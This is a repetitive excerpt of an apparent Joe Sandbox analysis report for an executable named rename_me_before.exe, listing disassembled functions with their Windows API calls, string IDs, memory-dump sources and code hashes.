                                                                                                                                                                                                                                                            Function 00007FF6404EE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction ID: 3435bf6396a4e8ad41bffa82bdd1c5e47a5f51866054ab524ff2bc78b19782cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951AF32A0C262E6EB64FF22904436877A1EB55B84F144136DA9C87BD5CF3CEA51CB81
                                                                                                                                                                                                                                                            Function 00007FF6404E7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF6404E324C,?,?,00007FF6404E3964), ref: 00007FF6404E7642
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                            • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                                                                                            • Instruction ID: 9b46986936144f648d47a0e7b2a7a9439cf12a4469b86afd1b15c1f4fe323bbc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131E821A1DAD2E5EA21FB25E8507EA6254FF94BF4F404231EE6D83BC9DF2CD6018740
                                                                                                                                                                                                                                                            Function 00007FF6404E25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                            • API String ID: 1878133881-653037927
                                                                                                                                                                                                                                                            • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                                            • Instruction ID: c0eb819fd3564ee5e643f48b34dc94857462298f51cb2860743b6e197fce8d6d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80118B7262CA96A1FA24FB10F551BA92364FB84B88F901135DA9C87744CF3CD605C740
                                                                                                                                                                                                                                                            Function 00007FF6404E2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                                                            • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                                                            • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                                                            • Instruction ID: 6898f3b46c731db5639d573c148691f02ad36a90d9b99ba9fc6f534e9f9b8114
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73118B7262CA96A1FA24FB10F551BA93364FB84B88F901135DA9C87744CF3CD604C740
                                                                                                                                                                                                                                                            Function 00007FF6404FB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                                                            • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                                                                                                            • Instruction ID: 599a62b5aa2e578da32bb14563ad975de4f9c5d34eedb2e8da3037ad89be6239
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4D11372B0CAA1D9E710EF79D4402AD37BAFB45B98B144236CE5E97B99DE38D406C340
                                                                                                                                                                                                                                                            Function 00007FF6404FC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC38C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC417
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                                            • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                                                                                                            • Instruction ID: 1ef1bf0e5bd98d2ff22e0bb385fbef1a6847c2f9b2b3b3861d2e4785353c280b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D791C132E2C672E5F754FB6595502BD2BAAFB44B88F544139DE0EA6B84CF38E4418700
                                                                                                                                                                                                                                                            Function 00007FF6404FEC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                                            • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                                                            • Instruction ID: 38937a7f78933b773a99b8541f26dbe591d1cc6131e1339b3253e5b3030255d1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4951F872F0C122EAFB18FF6599456BC37AAAB1035AF500135DE1D96BE5DF38A642C700
                                                                                                                                                                                                                                                            Function 00007FF6404F4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                                            • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                                                            • Instruction ID: 75f6c3af5d72fd27f8e01d6fb3b6d0b9943f265b4ae43a3d0d96952bcbb00385
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B516D22E0D661DAFB14FF71D4503BD27AAEB88B58F119535DE0987789DF38E4818740
                                                                                                                                                                                                                                                            Function 00007FF6404E2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                                            • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                            • Instruction ID: 4e1a192d0076a52cf4575ebaa225ae3dffb7ad558b6d2708bffdfd4671950fe0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F11A531E1C16292FA58FB6AE6842BD1292EF89B90F948031DB5987FDACD3DD5C18740
                                                                                                                                                                                                                                                            Function 00007FF6404EC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                                            • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                                                            • Instruction ID: d03305e209f12da7931db38f9328676fcaee51668232bcff120ac439f25be5d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39114826B18B169AEB00EF60E9442AC33A4FB59758F040E31DE2D86BA4DF78D1988340
                                                                                                                                                                                                                                                            Function 00007FF640504E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                            • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                                                                                                            • Instruction ID: 7d97436e2cdf763460f67447f8a9ec2903ea4407e4eaf198c9c52247051e6810
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A413E62A0C3A265F728BB25D60137E5755EF827A8F104235EE6C86BD6DF3CD441CB00
                                                                                                                                                                                                                                                            Function 00007FF6404F832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F835E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6404EBEC5), ref: 00007FF6404F837C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                            • API String ID: 3580290477-100362983
                                                                                                                                                                                                                                                            • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                                                                                                            • Instruction ID: 0d5b3cdb9dd6dd4a0d6acaf5750bde0d4d7acd2cc4dcc607e8aefcf81ecb72f2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51418132A0CB62E5E718FF25A5810BC379AEF457A4B554039EE5D87B95DE3CE4818700
                                                                                                                                                                                                                                                            Function 00007FF6404FF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                                                            • Opcode ID: 877ab66861cd581cb00139adc1238e41cebb29b8ab944fd3dc74440885d04d70
                                                                                                                                                                                                                                                            • Instruction ID: dcd28da8715499e852ed36772311ef6bc3a9062e7d6a0b07aae994aa9edb250e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 877ab66861cd581cb00139adc1238e41cebb29b8ab944fd3dc74440885d04d70
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84417E62F0C762E9FB10FBB198506FC26BAAF54758F540035DE4DA7B89DF78A4429320
                                                                                                                                                                                                                                                            Function 00007FF6404FBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
